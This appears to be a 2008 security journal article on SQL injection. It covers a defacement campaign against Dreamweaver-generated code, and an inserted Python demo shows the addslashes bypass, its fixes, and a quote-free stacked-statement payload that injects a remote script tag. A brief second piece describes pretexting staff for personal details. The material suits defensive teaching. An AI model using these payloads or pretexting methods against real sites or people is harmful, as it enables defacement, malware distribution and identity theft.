SQL INJECTION
Defacing websites via SQL injection
Johannes B. Ullrich, chief research officer, SANS Technology Institute; Jason Lam, instructor, SANS Institute

In early February 2007, security communities became aware of a major sports event website distributing malware [1]. It infected visitors through a technique that was well known at the time: a VML exploit targeting the Internet Explorer browser. Any visitor running Internet Explorer without the VML patch could be infected with the trojan. Investigation of the web page turned up an HTML script directive linking to a script hosted on a Chinese website. A large, legitimate organisation like this obviously had no interest in infecting its visitors with trojans, so what went wrong here?
January 2008

Increasing numbers of websites create page content on the fly from a SQL database. Page title, tables, checkboxes and essentially anything on the page can be generated from information in the data repository. This idea of creating a page template and generating pages from data in the database is like a dream come true for the development community. On the flip side, if the developer of the template is not careful, SQL injection can become a serious problem.

The sports website exploit was the most visible in a string of attacks performed by the same group of hackers. Logs recovered from other compromised sites indicated that this particular group frequently exploited a specific SQL injection vulnerability in Dreamweaver-generated code [2]. The vulnerability, found in code generated by versions of the software before 8.0.2, allowed attackers to insert SQL injection exploits. Interestingly, code generated by Dreamweaver for platforms as diverse as PHP, ASP and JSP suffered from the same flaw. In the PHP code of Listing 1, the content of the variable $colname_rs_byDate is not sufficiently validated before being used in the SQL statement in lines 6–8. Line 3 attempts to validate the content of the variable, but does so insufficiently.

PHP offers a ‘magic_quotes’ option (magic_quotes_gpc) which automatically escapes all parameters submitted by users. However, this option is not always enabled, so the generated code checks whether it is: if magic_quotes is off, the value is passed through the addslashes function; if it is on, the value is used as-is, because PHP has already escaped it. Either way, the only ‘validation’ performed is escaping. Addslashes adds a backslash in front of every single quote, double quote, backslash and NUL byte, and magic_quotes does the same thing when enabled. Such escaping is only meaningful when the value ends up inside a quoted string literal in the query. An example of a query where addslashes is not sufficient is:

Select a from x where b=$var

No quotes are used, so a value of $var like “1 or 1=1” contains nothing for addslashes to escape and still results in a valid SQL query, one that matches every row in the table.
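To make the failure concrete, here is an added example (not code from the article or from Adobe's advisory) that re-implements addslashes in Python and runs the flawed pattern against an in-memory SQLite database standing in for the site's MySQL content store. The table, rows and the constructed script URL (example.invalid, not the real domain named in the article) are made up for the demonstration; the function names are the author's own. Because the comparison is numeric and unquoted, the escaping never fires; the parameterised and integer-validated variants show the fix. The last function goes beyond the PHP case: it uses sqlite3's executescript() to stand in for a driver that executes stacked statements (mysql_query() did not, but several other platforms' drivers do) and shows how an attacker writes a script tag into content without using a single quote character.

```python
import sqlite3


def addslashes(value: str) -> str:
    """Re-implementation of PHP's addslashes(): backslash-escape \\, ', \" and NUL.

    This is all that the Dreamweaver-generated code (or magic_quotes_gpc) applied
    to request parameters. Digits, spaces, '=' and the word 'or' pass untouched.
    """
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\x00", "\\0"))


def make_db() -> sqlite3.Connection:
    """Constructed sample content table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Stadium opens its doors", 1),
         (2, "Ticket sales start Monday", 1),
         (3, "DRAFT: sponsor contract", 0)],
    )
    conn.commit()
    return conn


def fetch_vulnerable(conn: sqlite3.Connection, user_value: str) -> list:
    """The flawed pattern: escape, then interpolate into an unquoted numeric comparison."""
    colname = addslashes(user_value)
    # Equivalent of sprintf("SELECT ... WHERE id = %s", $colname_rs_byDate) in the PHP code.
    sql = "SELECT id, title FROM news WHERE id = %s" % colname
    return conn.execute(sql).fetchall()


def fetch_parameterised(conn: sqlite3.Connection, user_value: str) -> list:
    """Hardened form: the driver binds the value, so it can never become SQL syntax."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (user_value,)).fetchall()


def fetch_validated(conn: sqlite3.Connection, user_value: str) -> list:
    """For numeric keys, also reject anything that is not an integer before querying."""
    try:
        key = int(user_value)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (key,)).fetchall()


def quoteless_string(s: str) -> str:
    """Express s as a char() expression so that addslashes/magic_quotes have nothing to escape.

    sqlite's char() takes Unicode code points; MySQL's CHAR() and hex literals serve
    the same purpose for attackers who must avoid quote characters.
    """
    return "char(%s)" % ",".join(str(ord(c)) for c in s)


def deface_via_injection(conn: sqlite3.Connection, attacker_tag: str) -> list:
    """Stacked-statement variant of the same injection point.

    executescript() stands in for an API that runs several statements at once. The
    appended UPDATE writes a script tag into every title the page template will render.
    Returns the titles after the attack so the change can be inspected.
    """
    payload = "1; UPDATE news SET title = title || %s" % quoteless_string(attacker_tag)
    colname = addslashes(payload)  # unchanged: the payload contains no quote characters
    conn.executescript("SELECT id, title FROM news WHERE id = %s" % colname)
    return [row[0] for row in conn.execute("SELECT title FROM news ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    payload = "1 or 1=1"
    print("addslashes leaves the payload unchanged:", addslashes(payload) == payload)
    print("vulnerable   :", fetch_vulnerable(db, payload))    # every row, draft included
    print("parameterised:", fetch_parameterised(db, payload)) # no rows
    print("validated    :", fetch_validated(db, "2"))
    # Constructed URL; the real attack loaded 3.js from the domain named in the article.
    tag = '<script src="http://example.invalid/3.js"></script>'
    print("after defacement:", deface_via_injection(make_db(), tag))
```

The vulnerable query returns the unpublished draft along with the public rows, while the same input bound as a parameter matches nothing; the defacement path shows why "we escape the quotes" is not a defence when the attacker never needs one.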
SQL injection typically allows the attacker to formulate arbitrary SQL queries, which are executed with the permissions of the database account the web application uses to connect. Sadly, many system administrators are not careful enough to restrict the permissions of that account, which can lead to a number of dangerous exploits. In the example discussed here, the attacker may use SQL injection to modify the content of the database, which is then used to create web content. In effect this is a defacement of the site. However, in this case the defacement was not obvious to a casual visitor: only a single line of JavaScript was added. This line included the script “3.js” from dv521.com. When 3.js is loaded, it redirects the user to an iframe that links to the actual exploit. Exploits like this can go undetected for a long time because they are not visible to the user. This particular script, and various versions of it, were found on numerous well-maintained websites whose reliance on Dreamweaver-generated code made them vulnerable. Without host- or network-based intrusion detection, the exploit may go undetected for a while. The site was defaced at least twice. After the first defacement, the vulnerability was not immediately identified and an additional defacement was performed.

Listing 1: Here is a code sample from Adobe’s advisory.

Network Security

If a vulnerable version of Internet Explorer is used to access the page, the exploit installs a downloader which in turn causes a keystroke logger to be installed. The keystroke logger used in early 2007 specialised in finding World of Warcraft passwords. These passwords were then forwarded to Chinese ‘gold farmers’, who sold the credentials, or items the account holder owned within the game, to unsuspecting online gamers.
Resources
• ‘SQL Injection’, OWASP
• ‘PHP Magic Quotes’, PHP Online Manual, http://us.php.net/magic_quotes
• ‘American Football Championship Shenanigans’, Internet Storm Center, February 2007
• ‘Dreamweaver Server Behavior SQL Injection vulnerability’, Adobe Security Bulletins, May 2006
• ‘Protecting PHP server behaviors from SQL injection vulnerability’, Adobe Knowledgebase, June 2007
References
1. ‘Malicious website: Super Bowl XLI/Dolphin Stadium’, Websense, February 2007
2. ‘Multiple SQL Injection Vulnerabilities in Dreamweaver Generated Code’, SecurityFocus, May 2006
About the authors
Johannes Ullrich, Research Officer for the SANS Institute, is currently responsible for the SANS Internet Storm Center (ISC) and the GIAC Gold program. He founded DShield.org in 2000, which is now the data collection engine behind the ISC. His work with the ISC has been widely recognised, and in 2004 Network World named him one of the 50 most powerful people in the networking industry. Prior to working for SANS, Johannes worked as a lead support engineer for a web development company and as a research physicist. Johannes holds a Ph.D. in physics from SUNY Albany and is located in Jacksonville, FL.

Jason Lam is an author and instructor with the SANS Institute. His recent courseware development projects include a Web application security workshop, Intro to testing web applications, and an AJAX and Web services security overview. Jason started his career as a programmer before moving on to ISP network administration, where he handled network security incidents, which sparked his interest in infosec work. Jason specialises in network perimeter protection, penetration testing and intrusion detection. He holds a B.A. in Computer Science from York University in Toronto, Ontario, as well as CISSP, GCIA, GCFW, GCUX, GCWN and GCIH.
ID theft for beginners
Nollaig Dunne, technical security consultant, IRM plc.

I attended a fraud forum run by one of the credit reference agencies a number of months ago. There were many people in attendance from various financial houses, government departments and crime agencies making the usual pleasantries. Selfishly, I wanted a plug for IRM, so I did some digging on the senior director who was chairing the day’s lectures. Very quickly, with the help of my colleagues back in the office, I was able to access publicly available information on this particular chap. We were able to draw up an informal curriculum vitae for him, detailing where he had worked, when he had worked there, and what his role had been. However, this only served to whet the appetite.

During the lunch interval I approached members of the individual’s staff. Using the information gleaned, I asked how long they had known him, and then began politely probing into his background. Even after years working as an expert in identity theft, I am always impressed at how much information people will willingly give out about others. His employees were more than happy to give me specifics on the family, what he liked doing at weekends, how his kids played tennis, and so on. It was simple and I could have gone a lot further.

Given that I was speaking with fraud experts at an event organised to publicise the safety of personal information, how could this have been possible? In practice, it was relatively easy. Simply using freely-available information about an individual can improve an investigator’s credibility. Because I already knew something about this man, I appeared to be legitimate, which made it easier to extend what I knew. Feeling pretty pleased with my efforts I put together a rather scribbled one-pager and handed it over to this managing director before the afternoon’s lectures started. Sadly I didn’t get my plug. He didn’t want to be embarrassed, after all.
More than an embarrassment
But for most people, embarrassment is the least worrying aspect of having your identity compromised. Committing ID theft has never been easier. Public awareness of this issue has never been higher, thanks to recent high-profile cases publicised in the press. The loss of child benefit data on 25 million people by Her Majesty’s Revenue and Customs is a prime example.